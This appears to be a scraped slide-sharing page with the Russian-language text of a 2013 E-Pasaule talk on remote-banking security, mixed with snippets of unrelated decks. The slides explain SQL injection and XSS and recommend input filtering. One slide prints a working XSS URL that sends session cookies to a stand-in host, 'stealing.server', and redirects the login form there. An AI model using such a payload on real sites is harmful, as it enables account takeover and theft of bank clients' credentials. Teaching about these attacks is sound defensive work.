"Российский рынок АБС в условиях кризиса: импортозамещение (ПО локальной разр...mezhbank_ru
"Российский рынок АБС в условиях кризиса: импортозамещение (ПО локальной разработки и возможности кастомизации)" и антикризисные предложения Colvir Software Solutions, Николай Полунин, Руководитель направления казначейства и рисков.
"Российский рынок АБС в условиях кризиса: импортозамещение (ПО локальной разр...mezhbank_ru
"Российский рынок АБС в условиях кризиса: импортозамещение (ПО локальной разработки и возможности кастомизации)" и антикризисные предложения Colvir Software Solutions, Николай Полунин, Руководитель направления казначейства и рисков.
Юрий Гальчевский, Евгений Осинский: "Почему современному банку нужны облачные...De Novo
Доклад руководителя службы ИТ ПАО «БАНК АВАНГАРД» Юрия Гальчевского и руководителя отдела продаж облачных сервисов De Novo Евгения Осинского на технологическом практикуме "Облака без лишних слов", 06.07.2016
Юрий Гальчевский, Евгений Осинский: "Почему современному банку нужны облачные...De Novo
Доклад руководителя службы ИТ ПАО «БАНК АВАНГАРД» Юрия Гальчевского и руководителя отдела продаж облачных сервисов De Novo Евгения Осинского на технологическом практикуме "Облака без лишних слов", 06.07.2016
- Gemalto is a global leader in digital security, serving customers in banks and other industries with solutions used by over a third of the world's population daily.
- Gemalto provides strong authentication and fraud prevention solutions for online banking, including its Ezio Suite which supports multiple authentication channels and over 200 bank customers with 70 million delivered devices.
- Online banking fraud is increasingly sophisticated, using techniques such as man-in-the-middle attacks, phishing, and social engineering. Gemalto's solutions help mitigate these evolving threats.
5. Чем грозит ?
• Узнавать данные других клиентов,
добавить счета других клиентов
создавать, своих пользователей,
изменять документы и делать любые
манипуляции в БД интернет банка
Полный контроль за БД!
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
6. Как бороться ?
Если Вы «склеиваете» SQL команды,
в виде строки (String), значит вы
подвергаете себя риску.
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
7. XSS
(Cross site scripting)
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
8. XSS – Cross-site scripting
• Самая частая атака
• Атакующий вставляет JS код в сайт
или в URL
• Одна уязвимость подвергает
опасности весь сайт
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
9. Чем грозит ?
• Возможно завладеть деталями сессии
клиента и использовать их чтобы зайти в
систему под его логином.
• Возможно работать в контексте другого
клиента.
• Показать клиентам другую страницу
логина (phishing) и завладеть
информацией о клиенте
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
11. Уязвимые места
1. Возможно отправить JavaScript
в виде Сообщение в банк
2. Возможность отправки JavaScript’a
через формы переводов, указывая
цель платежа
3. Сохранение JavaScript в описании
счетов
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
12. Открыв адрес
https://банк.банк/login_page.jsp?reason=<script>$(document).ready(function
(){if(window.location.search=='?formName=login'){$.get('https://банк.банк/
profile/password.jsp',function(){window.location='https://банк.банк/form_s
how_bank.jsp?formName=profileForm%26formName=login';});}else{$.get('http:/
/stealing.server/?a='%2bdocument.cookie);$('%23profileForm').attr('action'
,'http://stealing.server');$('%23login').toggle();}});</script>&login='
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
14. Методы защиты
Тотальная фильтрация и проверка
получаемой на сервере информации!
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
16. На что обращать внимание?
• Системная архитектура
• Валидация данных (debugger)
• Импорт документов
• Управление сессиями
• Подписание документов
• Использование публичных
ресурсов (особенно hosted)
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
17. Как мы можем
ПОМОЧЬ?
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
18. Информация E-Pasaule
• Разработка и Внедрение
Оnline Решений
• Основаны в 1999 году
• Количество Сотрудников – 30
BUREAU VERITAS
ISO 9001:2008
сертифицированны
• ISO 9001:2008
Партнеры :
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
19. ДБО
Возможности
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
20. Интернет банк
Мобильный банк
SMS банк
Телефон банк
Integra`tion модуль
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
21. Integra`tion модуль
DMZ
Internet
Internet bank
Mobile bank
Phone bank
.. INTEGRATION
Firewall Firewall
CLIENT SIDE LAYER ADMIN SIDE
Firewall
CLUS
COM TER
PATIB CAMS dB
LE Firewall (MS SQL, Oracle,
Firebird SQL)
CORE BANKING CARD FAST PAYMENT OTHER BANKING
SYSTEMS SYSTEMS SYSTEMS SYSTEMS
(Wall, Equation, RS Bank) (Transmaster, Way4, ..) (Anelik, ..) (Loans, Securities, ..)
BANK
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013
22. ДБО Технологии
• Java (J2SE), JavaScript, Ajax
• WebServices, JDBC, JPA 2.0, JSON, XML
• Spring MVC, Spring Rest, Spring Security
• JavaServer Faces Technology, JSP
• Richfaces, Dojo, jQuery
E-PASAULE, Латвия | День Безопасности дистанционного банкинга | 03.04.2013